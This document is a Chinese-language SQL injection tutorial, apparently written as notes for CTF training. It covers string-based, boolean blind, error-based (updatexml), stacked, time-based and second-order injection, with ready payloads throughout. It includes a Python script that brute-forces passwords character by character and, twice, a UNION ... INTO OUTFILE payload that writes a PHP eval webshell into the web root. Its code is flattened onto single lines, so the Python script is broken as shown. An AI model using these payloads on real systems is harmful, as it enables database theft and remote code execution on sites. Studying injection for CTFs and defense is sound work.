文章目录
- 前言
- 知识学习
- 注释的两种形式
- 字符型注入
- 万能密码
- 布尔盲注
- 报错注入
- 堆叠注入
- 时间盲注
- 二次注入
- 小技巧
前言
这次学习建立在对数据库有基本的认识,了解基础的增删改查语句,数字型注入和字符型注入的基础上,进一步深入学习知识,并进行实战训练
知识学习
注释的两种形式
- #号,url编码用%23替代
- --空格
字符型注入
注入字符被引号包裹,需要采取一定的策略绕过,包括or截断,前面引号后面注释等
//eq:拼接sql语句查找指定ID用户
$sql = "select username,password from user
where username !='flag' and id = '".$_GET['id']."' limit 1;";
显然需要传入id,假设传入id=1,那么我们得到的效果就是id=‘1’,所以在这里需要构造语句来达到查询效果
在sql语句中,and运算符的优先级比or高,构造id=-1使username!='flag’失效,再构造or username='flag’达到查询效果。
payload:id=-1’ or username='fla
如果返回逻辑继续优化,我们就需要用常规联合查询的步骤走
//检查结果是否有flagif($row->username!=='flag'){$ret['msg']='查询成功';}
首先,通过排序逻辑判断列数
id=1 order by 2(依据第二列排序,这个数字逐渐增加,直到报错为止,得到列数)
select 1,database() 得到数据库名称
select group_concat(table_name) from information_schema.tables where table_schema=database();得到表名
select (select group_concat(column_name) from information_schema.columns where table_name=‘ctfshow_user’),database() 得到列名
select (select group_concat(password) from ctfshow_web.ctfshow_user2),database()%23 拿具体信息
在无过滤题目中,可以采取写入一句话木马再蚁剑连接的形式
id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23"
万能密码
假设我们的登录逻辑是user=‘a’ and password=‘b’,and逻辑的优先级比or高,所以如果前面的登录密码输错,那么一定是0,0 or 1的结果为1,所以就产生了万能密码,当然,在现在的网站中绝大部分都不会有这样的漏洞
‘or 1=1--
布尔盲注
注入没有明显的返回结果,注入成功页面正常,注入失败页面报错
猜测脚本
import requestsurl = "http://127.0.0.1/login.php"string = "abcdefghijklmnopqrstuvwxyz0123456789";
password = ""for i in range(10):for s in string:data={"username":f"xxx' or if(substr((select password from user where id = 1),{i+1},1)='{s}',1,0)#","password":"ctfshow"}response = requests.post(url=url,data=data)if "登录成功" in response.text:password+=sbreakelse:print(f"正在尝试第{i+1}位字符是否为{s}")print("password is "+password)
报错注入
报错会返回信息,利用这一点拿到信息
updatexml函数强制报错,并可执行语句,带出语句的查询结果
username=admin' or updatexml(1,concat('^',(select group_concat(column_name) from information_schema.columns where table_name='user' and table_schema=database()),'^'),1)%23&password=123123
类似的,采用整数溢出报错,不存在函数报错等等也能达到同样的效果
堆叠注入
多个;号多个注入语句
拼接法绕过
eg:@a=sele,@b=ct,@payload=@a+@b
时间盲注
可以执行sql注入,但是不知道注入结果,甚至不知道注入了没
- sleep函数获取延时信息
- 笛卡尔积查询(查询大量数量达到一定时间的效果)
- get_lock()函数延时法,针对数据库的长连接有效(php每次用完后就会断开连接,java维护数据库连接池,实现长连接)
二次注入
无法直接注入,但是可以把要注入的数据先放到数据库中,其他地方引用数据库中的的数据拼接语句时不再进行过滤
小技巧
表示数据时可以采用十六进制形式
无过滤题目可以采用写入shell,再蚁剑连接查看数据库
1 union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php"
)
